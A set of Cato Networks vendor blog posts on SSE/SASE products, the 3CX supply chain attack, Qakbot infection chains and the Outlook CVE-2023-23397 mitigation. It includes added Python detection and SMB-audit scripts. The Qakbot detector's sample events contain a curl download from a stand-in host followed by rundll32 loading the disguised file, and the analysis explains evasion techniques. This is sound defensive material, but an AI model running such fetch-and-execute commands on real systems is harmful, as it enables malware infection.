Partnering with Cato has given us quite a competitive edge—and it's not just about the technology (although it's a big part of it); we feel that we get the unique opportunity to partner with the inventor of a true 360-degree SASE platform. Cato's SSE solution pairs perfectly with our professional services and market-leading service portfolio—backed by our industry-first service guarantees and our dedicated team of cybersecurity experts. We could not be more pleased with this partnership and look forward to what the future will bring.
You're already offering SASE, powered by Cato Networks. How will this be different?
SSE is a subset to SASE, which is meant to describe the convergence of cloud security functions. SASE takes a broader and more holistic approach to secure and optimized access by addressing both optimization of the user experience and securing all access and traffic against threats, attacks, and data loss.
What we've announced has similarities with a SASE solution in almost every way, but unlike SASE, an SSE solution can be overlaid onto any existing network, such as an SD-WAN, allowing it to be deployed near-immediately to secure all endpoints, users and applications. Because of this, SSE brings an added level of simplicity in that no network changes are required to implement this security framework.
What is driving the demand for solutions like SSE and SASE?
Gartner has predicted that "By 2025, 80% of organizations seeking to procure SSE-related security services will purchase a consolidated SSE solution, rather than stand-alone cloud access security broker, secure web gateway and ZTNA offerings, up from 15% in 2021." This means there are many enterprises that are, or soon will be, searching for a comprehensive SSE solution. And since security for networks, applications and data continues to be a top concern for most C-level and IT executives, there are several reasons backing the strong demand for SSE and SASE:
Cybercriminals are becoming incredibly sophisticated in the ever-expanding threat landscape, and data breaches come with high price tags that can damage brand reputations and wallets.
Legacy networks were built around physical locations that don't scale easily because they are premises-based. Premises-based disjointed point solutions from multiple vendors often require manual maintenance.
With more applications moving to the cloud, SSE is a cloud-native framework specifically built for modern work environments (hybrid and remote). It delivers a self-maintaining service that continuously enhances all its components, resulting in reduced IT overhead and allowing enterprises to shift focus to business-critical activities. It also no longer makes sense for businesses to backhaul internet traffic through data center firewalls.
What can customers gain from a managed SSE solution?
SSE is a proven way to improve an organization's security posture by establishing a global fabric that connects all edges into a unified security platform and enables consistent policy enforcement. By choosing a managed SSE solution, you get near-instant protection on any network—integrating the best available cloud-native security components from Cato Networks into your existing network environment without any disruption. Customers gain this ironclad security architecture that seamlessly implements zero trust access, ensuring that all users only have access to company-authorized applications and relentlessly defends against anomalies, cyberthreats and sensitive data loss. And with Windstream Enterprise as your managed service provider for Cato's SSE technology, you get complete visibility via our WE Connect portal, along with the opportunity to integrate this view with additional Windstream solutions, such as OfficeSuite UC® for voice and collaboration and SD-WAN for network connectivity and access management. That means one single interface to control all your IT managed services—backed by industry-first service guarantees—to create real help you succeed in your businesses, on your terms.
Not to mention, we will act as an extension of your security team—so, not only do you seamlessly integrate these security components into one comprehensive offering, but you can rely on one trusted partner to deliver it all, with white glove support from our dedicated team of Cybersecurity Operations Center (CSOC) experts. This goes a long way for organizations who are looking to increase their cybersecurity investments, while also adhering to the limitations posed by the ongoing IT skills gap that is leading to shrinking IT and Security teams.
To learn more about SSE from Windstream Enterprise, powered by Cato Networks technology, visit windstreamenterprise.com/sse
Which SSE Can Replace the Physical Datacenter Firewalls?
Most SSE solutions can support moving branch security to the cloud. But only a few can securely cloudify the datacenter firewall. This is because datacenter firewalls don’t just address the need for secure Internet access, which is the main SSE capability. Rather, these firewalls are also used for securing WAN access, datacenter LAN segmentation and ensuring reliability and high availability to network traffic.
In this blog post, we explore which capabilities a datacenter firewall-replacing SSE needs to have. To read a more in-depth explanation about each capability, go to the eBook this blog post is based on.
Replacing the Datacenter Firewall: SSE Criteria
An SSE solution that can replace the datacenter firewall should provide the following capabilities:
1. Secure Access to the Internet
SSE needs to secure access to the internet. This is done by analyzing and protecting all internet-bound traffic, including remote user traffic, based on rules IT sets between network entities. In addition, SSE will include an SWG for monitoring and controlling access to websites. Finally, SSE will have built-in threat prevention, including anti-malware and IPS capabilities as a service.
2. Secure Access From the Internet
While many SSE solutions use proxy architectures to secure outbound Internet traffic, SSE solutions that can replace the datacenter firewall are built from the ground up with an NGFW architecture. This enables them to secure traffic directed at datacenter applications and also direct traffic to the right server and applications within the WAN.
3. Secure WAN Access
A WAN firewall controls whether traffic is allowed or blocked between organizational entities. The SSE-based WAN firewall can also leverage user awareness capabilities and advanced threat prevention.
4. Secure LAN Access
SSE should secure VLAN traffic using access control and threat prevention engines. This must be done at the nearest SSE PoP to avoid latency. There also needs to be an option to route the traffic via an on-premise edge appliance.
In addition to these capabilities, SSE needs to have visibility into the entire network. The visibility enables protecting WAN traffic and remote users accessing internal applications and the governance of applications, ports and protocols.
Cato’s SSE 360 solution, built on a cloud-native architecture, secures traffic to all edges and provides full network visibility and control. Cato’s SSE 360 delivers all the functionality a datacenter firewall provides, including NGFW, SWG, advanced threat protection and managed threat detection and response.
To learn more, read the eBook “Which SSE Can Replace the Physical Datacenter Firewalls”, right here.
The 3CX Supply Chain Attack – Exploiting an Ancient Vulnerability
Supply chain attacks are one of the top concerns for any organization as they exploit (no pun intended) the inherited trust between organizations. Recent examples of similar attacks include SolarWinds and Kaseya. On March 29th, a new supply chain attack was identified targeting 3CX, a VoIP IPBX developer, with North Korean nation-state actors as the likely perpetrators.
What makes the 3CX attack so devastating is the exploitation of a 10-year-old Microsoft vulnerability (CVE-2013-3900) that makes executables appear to be legitimately signed by Microsoft while, in fact, they are being used to distribute malware. This is not the first time this vulnerability has been exploited; earlier this year, the same tactic was used in the Zloader infection campaign. In the 3CX case, the two “signed” malicious DLLs were used to connect to a C&C (Command and Control) server and ultimately connect to a GitHub repository and download an information stealing malware that targets sensitive data users type into their browser.
The Cato Networks security group responded to this threat immediately. Customers whose systems were communicating with the second-stage payload server were contacted and informed of which devices were compromised. All domains and IPs associated with the campaign were blocked to limit any exposure to this threat.
Cato’s approach to such threats is one of multiple choke points, ensuring the threat is detected, mitigated, and prevented along its entire attack path. This can only be done by leveraging the private cloud backbone in which each PoP has the entire security stack sharing and contextualizing data for each network flow. Cato’s mitigation of the 3CX threat includes:
Malicious domains are tagged as such and are blocked. The firewall rule for blocking malicious domains is enabled by default.
IPS (Intrusion Prevention System) – Payload servers were added to the domain blocklist. This is complementary to the firewall rules and does not depend on them being enabled.
Anti-malware – All 3CX-associated trojans are blocked.
MDR (Managed Detection and Response) – the MDR team continues to monitor customer systems for any suspicious activities.
Cato Networks security group will continue to monitor this threat as it develops. For a detailed technical analysis of the attack see Cyble’s blog.
The Evolution of Qakbot: How Cato Networks Adapts to the Latest Threats
The world of cybersecurity is a never-ending battle, with malicious actors constantly devising new ways to exploit vulnerabilities and infiltrate networks. One such threat, causing headaches for security teams for over a decade, is the Qakbot Trojan, also known as Qbot. Qakbot has been used in malicious campaigns since 2007, and despite many attempts to stamp it out, continues to evolve and adapt in an attempt to evade detection.
Recently, the Cato Networks Threat Research team analyzed several new variants of Qakbot that exhibited advanced capabilities and evasive techniques to avoid detection. The team quickly built and deployed protection for these changes into the Cato Networks IPS. In this analysis, the Cato Networks Research Team exposes the tactics, techniques, and procedures (TTPs) of the latest Qakbot variant and explores its potential impact on enterprises and organizations if left alone.
During the COVID-19 pandemic, an eruption of cyberattacks occurred, including significant growth of attacks involving ransomware. As part of this surge, Qakbot’s threat actor adapted and paired with other adversaries to carry out ferocious multi-stage attacks with significant consequences.
Qakbot is sophisticated info-stealing malware, notorious as a banking trojan, and is often used to steal financial information and conduct fraudulent financial transactions. Pursuing even larger gains, in the last few years, Qakbot targets have shifted from retail users to businesses and organizations.
As recent versions of Qakbot emerge, they present new infection techniques to both avoid detection and maintain persistence on the infected systems. Qakbot’s latest design updates, together with more complex multi-stage infection processes, enable it to evade most traditional security software detection techniques and pose a significant and ongoing threat to unprotected businesses and organizations.
How Do the Latest Versions of Qakbot Work?
The first stage of the Qakbot infection process begins when a user clicks on a link inside a malicious email attachment. In the latest Qakbot versions, the malicious file attachments are typically ZIP, OneNote or WSF files (WSF is a file type used by the Microsoft Windows Script Host). ZIP, OneNote and WSF files are commonly used by malicious actors as they make it easier to evade the Mark of the Web (MOTW). MOTW is a security mechanism implemented by Microsoft to detect and block files with macros (such as Excel files) that were downloaded from the internet and may be compromised. By using file types that do not receive MOTW, Qakbot attachments are more likely to evade detection and blocking.
When the user opens the WSF or OneNote file and clicks the embedded link, Qakbot covertly launches a series of commands, allowing the malware to infect the system and take additional measures to evade detection.
Malicious files are cloaked as innocuous files by abusing Living Off the Land Binaries (LOLBins) and by imitating commonly used file types, such as Adobe Cloud files, to stay hidden. LOLBins are legitimate binaries or executables found in the Windows operating system that are also used by attackers to carry out malicious activities. These binaries are typically present on most Windows machines and are legitimately used for system maintenance and administration tasks but can easily be abused to execute malicious code or achieve persistence on compromised systems. Attackers commonly make use of LOLBins because they are present on most Windows systems and are typically on the allow list of common security software, making them more difficult to detect and block. Examples of common LOLBins include cmd.exe, powershell.exe, rundll32.exe and regsvr32.exe.
After the initial infection stage is complete, Qakbot expands its footprint on the infected system and eventually uses encrypted communication with Qakbot command and control (C2) servers to further conceal its activities and evade detection.
An example of a shared malicious PDF attachment instructing the victim to execute the bundled .wsf file
Let’s explore four different recent Qakbot infection scenarios to learn exactly how they operate.
Scenario 1: Malicious email with an embedded .hta file, hidden within a OneNote file attachment, leading to multi-stage infection process:
From the malicious email, the user (victim) is led to click a malicious link hidden inside a legitimate-looking OneNote file attachment. After clicking the link, the infection chain begins. The malicious link is, in actuality, an embedded .hta file, executed when the link is clicked. The .hta file includes VBScript code used to deliver the Qakbot payload and infect the device. Windows uses MSHTA.exe to execute .hta files. Typically, MSHTA.exe is used legitimately to execute HTML applications, which is why this process usually evades detection as being malicious.
Embedded malicious .hta file using VBScript to execute commands on the operating system
After the .hta file is initiated, it executes curl.exe to force download an infected dll file from a remote C2 Qakbot server. The Qakbot payload is disguised as an image file to evade detection during the download process. Curl is another normally legitimate tool, used for transferring data over the internet.
De-obfuscated code from the .hta file showing the execution of curl.exe and the Qakbot payload
The .hta file then executes the Qakbot dll file using rundll32.exe. Rundll32.exe is another normally legitimate Windows application used to run DLL files. In this scenario, executing rundll32.exe allows the malicious DLL file, disguised as an image, to be successfully loaded into the system, undetected.
Example of Qakbot’s infection chain
Loaded onto the system successfully, Qakbot then hides itself by spawning a new process of wermgr.exe and injecting its code into it. Wermgr.exe is a legitimate Windows Event Log application. Masquerading as a legitimate process enables the malware to run in the background and avoid detection by most common anti-virus software.
Scenario 2: Like Scenario 1, but in this variation, a malicious email with an embedded .cmd file is hidden within a OneNote file attachment, leading to a multi-stage infection process.
From the malicious email, the user (victim) is led to click the malicious link hidden inside a legitimate OneNote file attachment. After clicking the link, Qakbot begins the infection chain. The malicious link is, in actuality, an embedded .cmd file, which executes when the link is clicked. Windows uses CMD.exe to execute the .cmd file. CMD.exe is a legitimate command-line interpreter, used to execute commands in Windows operating systems. Being a LOLBin, this process is usually abused to evade detection.
.cmd file content
The .cmd file invokes PowerShell to force download an encrypted payload from a remote Qakbot C2 server. PowerShell is a powerful scripting language built into Windows operating systems and is typically used for task automation.
Decoded base64 string from the .cmd script
The downloaded payload dll file is executed using Rundll32.exe, with the same purpose as in the previous scenario.
Loaded onto the system successfully, Qakbot then hides itself by spawning a new process of wermgr.exe and injecting its code into it.
Scenario 3: Malicious email with a Zip attachment bundling a .WSF (Windows Script File) file.
In this variation, a malicious email with an infected WSF file is hidden within a Zip attachment designed to mimic an Adobe Cloud certificate. The Zip file often has a legitimate-looking name and is specifically designed to trick the user (victim) into thinking the attachment is safe and harmless.
From the malicious email, the user (victim) is led to open the attachment and extract the files it bundles. Inside the Zip there are 3 files: .WSF, PDF and TXT. The PDF and TXT are decoy files, leading the user to click and open the .WSF file, initiating the infection chain. Typically, .WSF files contain a sequence of legitimate commands executed by Windows Script Host. In this case, the WSF file contains a script that executes the next stage of the Qakbot infection process.
The obfuscated script executes the Qakbot dll using Rundll32.exe.
Loaded onto the system successfully, Qakbot moves to hide itself, spawning a new wermgr.exe process and injecting its code into it.
Scenario 4: Malicious email with .html attachment using the HTML Smuggling technique
HTML Smuggling is a technique that allows threat actors to smuggle malicious binary code into a system by cloaking the malicious binary within an innocuous-looking .html attachment.
From the malicious email, the user (victim) is led to open the innocuous-looking .html attachment containing the hidden binary. In some cases, the .html file arrives within a ZIP archive file, adding an additional step to the complexity of the attack.
Once opened, the .html file delivers a malicious, password-protected, .ZIP archive file stored within the code of the attachment. The file password is provided in the .html file.
Malicious .html file – fooling the victim into opening the password-protected .ZIP file
Inside the .ZIP archive file, a malicious .img file is bundled. IMG files are binary files that store raw disk images of floppy disks, hard drives, or optical discs. IMG and ISO files are commonly used legitimately to install large software. In the case of Qakbot, once the IMG file is loaded, it mounts itself as a drive and exposes its contents.
The malicious .img file actually bundles several other files, including a .LNK (Windows shortcut file) file. Executing the .LNK file initiates the complex infection chain using the other files within the mounted .img file.
During the infection chain, a malicious .WSF file is executed, invoking PowerShell to force download an encrypted payload (the Qakbot dll) from a remote Qakbot C2 server. PowerShell is a powerful scripting language built into Windows operating systems and is typically used for task automation.
Request to download Qakbot’s dll from the C2 server using PowerShell
The .WSF script then executes the Qakbot dll using Rundll32.exe.
Loaded onto the system successfully, Qakbot moves to hide itself, spawning a new wermgr.exe process and injecting its code into it.
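The four scenarios above share a small set of parent/child process relationships, which is what an endpoint detection can key on. The following is an added example, not code from the original article or from Cato: it applies those relationships to constructed process-creation events, and the event schema, rule names and list of image extensions are assumptions.

```python
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Process names come from the scenarios above; the extension list is an assumption.
LURE_PARENTS = {"onenote.exe", "mshta.exe", "wscript.exe"}
SCRIPT_HOSTS = {"mshta.exe", "cmd.exe", "wscript.exe", "powershell.exe"}
DOWNLOADERS = {"curl.exe", "powershell.exe"}
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif", ".bmp"}


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (hypothetical schema, e.g. mapped from EDR logs)."""
    host: str
    pid: int
    ppid: int
    image: str
    cmdline: str = ""


def base(path):
    """Lower-cased file name of a Windows path."""
    return PureWindowsPath(path).name.lower()


def rundll32_target(cmdline):
    """File that rundll32 was asked to load: the text before the first comma."""
    s = cmdline.strip()
    if s.startswith('"'):  # quoted executable path
        end = s.find('"', 1)
        rest = s[end + 1:] if end != -1 else ""
    else:
        parts = s.split(None, 1)
        rest = parts[1] if len(parts) > 1 else ""
    return rest.split(",", 1)[0].strip().strip('"')


def ancestry(event, index, limit=8):
    """Process names from the oldest known ancestor down to the event itself."""
    names, seen, cur = [base(event.image)], {event.pid}, event
    while len(names) < limit:
        parent = index.get((cur.host, cur.ppid))
        if parent is None or parent.pid in seen:  # unknown parent or PID loop
            break
        names.append(base(parent.image))
        seen.add(parent.pid)
        cur = parent
    return names[::-1]


def detect(events):
    """Return (host, rule, chain) for every rule an event matches."""
    index = {(e.host, e.pid): e for e in events}  # ignores PID reuse for brevity
    findings = []
    for e in events:
        names = ancestry(e, index)
        name = names[-1]
        parent = names[-2] if len(names) > 1 else ""
        hits = []
        if name in SCRIPT_HOSTS and parent == "onenote.exe":
            hits.append("onenote_spawns_script_host")        # scenarios 1 and 2
        if name in DOWNLOADERS and set(names[:-1]) & LURE_PARENTS:
            hits.append("download_under_lure_process")       # curl / PowerShell stage
        if name == "rundll32.exe":
            target = PureWindowsPath(rundll32_target(e.cmdline))
            if target.suffix.lower() in IMAGE_EXTS:
                hits.append("rundll32_loads_image_extension")  # DLL disguised as image
            if parent in SCRIPT_HOSTS:
                hits.append("rundll32_from_script_host")
        if name == "wermgr.exe" and parent == "rundll32.exe":
            hits.append("wermgr_child_of_rundll32")          # final stage in all scenarios
        findings += [(e.host, rule, " > ".join(names)) for rule in hits]
    return findings


def hosts_with_chain(findings, min_rules=3):
    """Hosts where several distinct stages fired, i.e. a likely full chain."""
    rules_by_host = {}
    for host, rule, _ in findings:
        rules_by_host.setdefault(host, set()).add(rule)
    return sorted(h for h, r in rules_by_host.items() if len(r) >= min_rules)


# Constructed events: WS01 follows scenario 1, WS02 is ordinary desktop activity.
SAMPLE_EVENTS = [
    ProcEvent("WS01", 100, 1, r"C:\Windows\explorer.exe"),
    ProcEvent("WS01", 200, 100, "ONENOTE.EXE", "ONENOTE.EXE invoice.one"),
    ProcEvent("WS01", 300, 200, r"C:\Windows\System32\mshta.exe"),
    ProcEvent("WS01", 310, 300, "curl.exe",
              r"curl.exe -o C:\ProgramData\photo.png http://download.example.invalid/photo.png"),
    ProcEvent("WS01", 320, 300, "rundll32.exe", r"rundll32.exe C:\ProgramData\photo.png,Start"),
    ProcEvent("WS01", 400, 320, r"C:\Windows\System32\wermgr.exe"),
    ProcEvent("WS02", 50, 1, r"C:\Windows\System32\svchost.exe"),
    ProcEvent("WS02", 100, 1, r"C:\Windows\explorer.exe"),
    ProcEvent("WS02", 210, 100, "ONENOTE.EXE"),
    ProcEvent("WS02", 220, 100, "rundll32.exe",
              r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL'),
    ProcEvent("WS02", 230, 50, r"C:\Windows\System32\wermgr.exe"),
]

if __name__ == "__main__":
    for host, rule, chain in detect(SAMPLE_EVENTS):
        print(f"{host}  {rule:32}  {chain}")
    print("likely full chain on:", hosts_with_chain(detect(SAMPLE_EVENTS)))
```

Each rule on its own can fire on legitimate administration activity; requiring several distinct stages on the same host, as `hosts_with_chain` does, is what keeps the signal usable.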
After Qakbot infects a system, the malware evaluates and performs reconnaissance on the infected environment. If the environment is worthwhile, Qakbot downloads additional tools, such as Cobalt Strike or Brute Ratel frameworks. These frameworks are commercially used by Red Teams for penetration testing purposes.
Unfortunately, leaked versions of many penetration testing frameworks have also found their way to the open market and are abused by threat actors. Using these tools, threat actors perform advanced post-exploitation actions, including privilege escalation and lateral movement.
Eventually, the greatest threat posed by Qakbot and similar families of malware is ransomware. In some of the most recent attacks, Qakbot has been observed delivering BlackBasta ransomware. BlackBasta is a notoriously effective ransomware variant, used to successfully attack many businesses throughout the US and Europe. BlackBasta uses the double extortion technique, where an attacker demands a ransom payment to restore the victim’s access to their own encrypted files and/or data and threatens to sell the user or organizational data on the Darknet if the ransom is not paid.
Cato Networks internal security team dashboard displays a suspected attempt to exfiltrate data
How Cato Protects You Against Qakbot
Qakbot, like other malware, is constantly evolving and being updated with new methods and attempts at infection and infiltration. Making sure your current threat detection solution can detect and block these types of changes to malware threats as quickly as possible is critical to your ongoing organizational security. Cato Networks IPS (Intrusion Prevention System) was immediately updated with the latest changes to Qakbot in order to block the malware from communicating with its C2 servers. Cato’s Security Research team uses advanced tools and strategies to detect, analyze and build robust protection against the latest threats. The following dashboard view is part of an arsenal of tools used by the Cato Research Team and shows auto-detection of a suspected Qakbot attack, with Cato IPS blocking any additional communication between the malware and its C2 servers.
Cato Networks internal security team dashboard displaying detection and blockage of outbound Qakbot communication
It has never been clearer that no company can expect to fight the constant evolution of malware and malicious attacks without help from the experts. Cato’s Security Research team remains committed to continuously monitoring and updating our solutions to protect your organization against the latest threats. Utilizing the Cato Networks solution, enjoy an enhanced overall security posture, safeguard against the ever-evolving threat of malware, and confidently prioritize what truly matters - your business.
To learn more about how Cato protects against Qakbot and similar threats and intrusions and how you can mitigate security risks for your organization, check out our articles on intrusion prevention, security services, and managed threat detection and response.
Indicators of compromise (IOCs)
Cato Protects Against CVE-2023-23397 Exploits
A new critical vulnerability impacting Microsoft Outlook (CVE-2023-23397) was recently published by Microsoft. The CVE is particularly concerning as no user involvement is required by the exploit. Once a user receives a malicious calendar invite, the attacker can gain a user’s Active Directory credentials.
Microsoft has released a security update that can be found here. Cato Research strongly encourages updating all relevant systems as proof-of-concept exploits have already appeared online. Until all systems have been updated, Cato customers can rest easy. By default, any Cato-connected endpoint – remote user, site, or any other type of user – is protected from the attacks exploiting the CVE.
What is CVE-2023-23397 and How Does it Work?
CVE-2023-23397 is a critical vulnerability in the Outlook client. An attacker can craft a .MSG file in the form of a calendar invite that triggers an authentication attempt over the SMB protocol to an attacker-controlled endpoint without any user interaction. (.MSG is the file format used to represent Outlook elements, such as email messages, appointments, contacts, and tasks.)
If the SMB authentication attempt is done using NTLM, the Outlook client will send the attacker a Net-NTLM hash along with the username and domain name. This enables an attacker to perform an offline dictionary-based attack on the hash. The result: the user's password and username are revealed and can then be used to authenticate to and attack exposed services that rely on Active Directory credentials.
What is Cato’s Mitigation?
Immediately after the exploit was disclosed, Cato’s Security Research team began investigating the CVE. Cato IPS does not inspect the Outlook .MSG elements as that would be out of scope for an IPS system. But the CVE does require an outbound SMB session to exfiltrate data and, by default, Cato’s firewall implements a deny rule, blocking outbound SMB traffic. Only SMB sessions terminating at known, trusted servers should be allowed.
Our team continues to review a dedicated IPS signature to be enforced globally for this threat. It will ensure that potential information leakage, such as that presented by this CVE, is prevented regardless of the customer's firewall configuration. With hybrid Active Directory setups that extend AD identities to the cloud and may utilize SMB, careful review of the data is required to avoid false positives caused by legitimate usage. Further notice will be provided to Cato customers in forthcoming Release Notes.
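The rule stated above (deny outbound SMB, allow only sessions that terminate at known, trusted servers) can be checked against exported flow logs. The following is an added example, not Cato's code or configuration: the log format, the address ranges and the trusted-server list are constructed, and the allowlist is evaluated first so that legitimate cloud-hosted SMB endpoints in a hybrid AD setup can be listed explicitly.

```python
import csv
import ipaddress

SMB_PORTS = {445, 139}  # direct SMB and SMB over the NetBIOS session service

# Constructed values: replace with the organisation's own ranges and file servers.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
TRUSTED_SMB = [ipaddress.ip_network(n) for n in ("10.20.0.10/32", "10.20.0.11/32")]

# Constructed flow log (documentation addresses): timestamp,src,dst,dport,proto,action
SAMPLE_FLOWS = """\
2023-03-16T09:00:01Z,10.1.4.23,10.20.0.10,445,tcp,allow
2023-03-16T09:00:05Z,10.1.4.23,203.0.113.50,445,tcp,deny
2023-03-16T09:01:10Z,10.1.7.88,198.51.100.7,445,tcp,allow
2023-03-16T09:02:00Z,10.1.7.88,10.1.9.5,445,tcp,allow
2023-03-16T09:03:00Z,10.1.4.23,198.51.100.7,443,tcp,allow
"""


def in_any(ip, nets):
    return any(ip in net for net in nets)


def classify(dst):
    """Where an SMB session terminates, relative to the policy."""
    ip = ipaddress.ip_address(dst)
    if in_any(ip, TRUSTED_SMB):
        return "trusted"
    if in_any(ip, INTERNAL_NETS):
        return "internal_unlisted"
    return "external"


def audit(log_text):
    """Sort SMB flows into policy violations, blocked attempts and items to review."""
    report = {"violation": [], "blocked_attempt": [], "review": []}
    for row in csv.reader(log_text.splitlines()):
        if not row:
            continue
        ts, src, dst, dport, proto, action = row
        if proto != "tcp" or int(dport) not in SMB_PORTS:
            continue
        kind = classify(dst)
        if kind == "external":
            # Allowed outbound SMB to an unknown server is the exposure the deny rule
            # closes; a denied attempt still identifies a client worth triaging.
            key = "violation" if action == "allow" else "blocked_attempt"
            report[key].append((ts, src, dst))
        elif kind == "internal_unlisted" and action == "allow":
            report["review"].append((ts, src, dst))  # candidate for the allowlist
    return report


if __name__ == "__main__":
    for category, flows in audit(SAMPLE_FLOWS).items():
        for ts, src, dst in flows:
            print(f"{category:16} {ts}  {src} -> {dst}")
```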
Are You Trapped in the Upside-Down World of Networking and Security?
Many enterprises today are exploring the benefits of Secure Access Service Edge (SASE). SASE is a modern networking and security solution for enterprises that converges SD-WAN and network security solutions like NGFW, IPS, and NGAM. SASE provides a single, unified and cloud-native network and security service that is adapted to current and future technology and business needs.
Despite the increasing availability of SASE, some enterprises still maintain legacy appliances for their networking and security needs. Such businesses are trapped in an upside-down world that operates in technology silos and requires countless IT resources to deploy, manage, and maintain.
In this blog post, we will compare old-fashioned point solutions from the upside-down world to Cato’s modern SASE Cloud. We’ll examine the following five characteristics:
Network Devices
High Availability
Security Updates
The Hardware Refresh Cycle
TLS Inspection
To read more about each characteristic, you’re welcome to read the eBook this blog post is based on, SASE vs. the Upside Down World of Networking and Security.
Characteristic #1: Network Devices
Let’s first compare network devices. Network devices are the physical appliances that enable connectivity and security in the network.
Network Devices in the Upside-down World:
Difficult to maintain and monitor
Logistical and supply chain issues
Cato Socket in the SASE World:
Simple to use
No supply chain issues
Characteristic #2: High Availability
Next, let’s look at high availability. High availability is about ensuring the network is always accessible, regardless of outages, natural disasters, misconfigurations, or any other unforeseen event.
High Availability in the Upside-down World:
Costly to buy redundant hardware
Scalability is limited to box capacity
Requires hours of management and troubleshooting
Prone to configuration errors
High Availability in SASE World:
A frictionless process
Simplicity that reduces risk
Characteristic #3: Security Updates
No comparison would be complete without addressing security. With so many cyberthreats, security is an integral part of any enterprise IT strategy. But IT’s task list is filled to the brim with multiple competing priorities. How can businesses ensure security tasks aren’t pushed to the bottom of the list?
Security Updates in the Upside-down World:
Cumbersome and complex
Disruptive to the business
Requires manual intervention for “automated” tasks
Higher risk of failure
Security Updates in SSE 360 World:
Hourly automatic updates from 250+ security feeds
Transparent to the user
Minimal false positives
IT and security have time to work on other business-critical projects
Characteristic #4: Hardware Refresh Cycle
When hardware becomes obsolete or can no longer satisfy technology or capacity requirements, it needs to be evaluated and upgraded. Otherwise, productivity will be impacted, security will be compromised, and business objectives will not be met.
The Hardware Refresh Cycle in the Upside-down World:
A slow, time-consuming process
Dependent on the global supply chain
Can be blocked by budgets or politics
Requires extra IT resources
The Hardware Refresh Cycle in SASE World:
A one-time process - SASE scales, is continuously updated and is suitable for multiple use cases
Easily adopt new features
Unlimited on-demand scalability
Flexible, cost-effective pricing models and easy to demonstrate ROI
Reduces administrative overhead
Characteristic #5: TLS Inspection
Finally, TLS inspection decrypts traffic, inspects it and then re-encrypts it, which prevents hackers from performing reconnaissance or progressing laterally.
TLS Inspection in the Upside-down World:
Scoping, acquiring, deploying and configuring more hardware
Backhauling traffic for firewall inspection
Increased certificate management
Requires higher throughput
TLS Inspection in SSE 360 World:
Wire speed performance
Consistent TLS inspection
Quick and easy setup
Simple deployment at scale
Minimal resources required
Getting Out of the Upside-Down World
With SASE, enterprises can ensure they are never trapped in an upside-down world of cumbersome legacy appliances. SASE provides business agility, on-demand scalability, and 360-degree security along with simplified management and maintenance for IT and security teams. The cloud-native SASE architecture connects and secures all resources and edges, anywhere in the world, based on identity-driven access.
To read more about the differences between legacy appliances and SASE (and how to rescue yourself) read the eBook SASE vs. the Upside Down World of Networking and Security.
The Value of Network Redundancy
Corporate IT infrastructure has become crucial to the success of the modern business. Disruption in the availability of corporate applications and services will impact employee productivity and business profitability.
Companies are responsible for the resiliency of their own IT systems and this includes ensuring the constant availability of critical business applications for employees, customers, and partners. Network outages are possible; however, how rapidly the network recovers with minimal disruption to the business is what matters most.
Network redundancy is designed to limit the risk of a network outage halting business operations. Building resiliency and redundancy into the corporate network enables an organization to rapidly recover and maintain operations.
Impact of Network Redundancy
Network redundancy is designed to ensure that no single point of failure exists within an organization’s network infrastructure. This benefits the modern business in numerous ways:
Security: Network outages occur, and the impact can be measured in numerous ways, including the network security impact. Network outages caused by DDoS or other such attacks will have a significant impact on day-to-day business operations, affecting branch and remote workers, thus impacting some of their enterprise security protection. Such incidents are also used to launch stealth attacks on critical business systems to further damage business operations. Network redundancy improves security by providing alternate routes for impacted network traffic, thus reducing the chances of experiencing outages that place business resources and the network at risk.
Performance: If an organization is dependent on a single network link or carrier, then its network performance is only as good as that carrier’s network. If the provider suffers an outage or degraded performance, so does the company. Network redundancy can enable an organization to optimize its use of multiple network carriers to avoid outages or degraded service.
Reliability: The primary purpose of network redundancy is to eliminate single points of failure that can cause outages or degraded performance. Redundancy improves resiliency by limiting the potential impact if a system or service goes down.
How Redundancy in Cato’s Architecture Works
The Cato SASE Cloud is composed of a global network of points of presence (PoPs) that are connected via multiple Tier-1 network providers. When traffic enters the Cato SASE Cloud, a PoP performs security inspection, applies all policies, and optimally routes the traffic to the PoP nearest its destination.
The design of the Cato SASE Cloud provides multiple layers of redundancy to ensure consistent service availability. As a result, it is highly resilient against several types of failures, including:
Carrier Outage: The Cato SASE Cloud was designed using multiple tier-1 carriers to connect its PoPs and provide reliable, high-performance network connectivity. If a carrier’s service begins to degrade, the PoPs will automatically detect this and failover to an alternate carrier to maintain optimal performance and availability.
InterPoP Outage: The Cato SASE Cloud is composed of a network of PoPs in 75+ global locations. If a PoP experiences an outage, all services running inside this PoP will automatically failover to the nearest available PoP, and all traffic to that PoP will automatically reroute to the nearest available PoP.
Intra-PoP Outage: A PoP consists of a collection of Cato Single Pass Cloud Engines (SPACE) that powers the global, scalable, and highly resilient Cato SASE Cloud. Multiple SPACE instances run inside of multiple high powered compute nodes inside each PoP. If one SPACE instance fails, it will failover to another instance within the same compute node. If a compute node fails, all SPACE instances will failover to another compute node inside the same PoP.
Cato Sockets: Each Cato Socket has multiple WAN ports and can run in active/active/active mode. When deployed as redundant hardware, a socket’s traffic will failover to the redundant socket if it fails. And, in the event the Cato SASE Cloud experiences an unlikely complete outage, Cato Sockets can provide direct WAN connectivity over the public Internet.
Network outages can have a dramatic impact on an organization’s ability to conduct normal business. Cato’s network design protects against potentially catastrophic outages of the Cato SASE Cloud network.
The Advantage of Cato’s Network Redundancy
Network redundancy is a significant consideration when comparing network options. Often, it was one of the main selling points for older network technologies like multi-protocol label switching (MPLS) and software-defined WAN (SD-WAN) solutions.
MPLS, SD-WAN, and the Cato SASE Cloud all achieve network resiliency in different ways.
MPLS: MPLS is known for its middle-mile resiliency and redundancy since traffic flows through the MPLS provider’s internal systems. However, the cost of MPLS circuits often makes redundant circuits for last-mile coverage cost-prohibitive.
SD-WAN: SD-WAN solutions are designed to optimally route traffic over the public Internet to provide improved performance and reliability at a fraction of the cost of MPLS. However, these solutions are limited by the performance and resiliency of the public Internet, making it challenging for them to meet the same SLAs as an MPLS solution.
Cato SASE Cloud: The Cato SASE Cloud provides high middle-mile performance and resiliency via a global network of PoPs with built-in redundancy and traffic optimization, connected via tier-1 carriers. Cato Sockets have multiple WAN ports in active/active/active mode, allowing customers to connect multiple last-mile service providers and implement inexpensive last-mile redundancy.
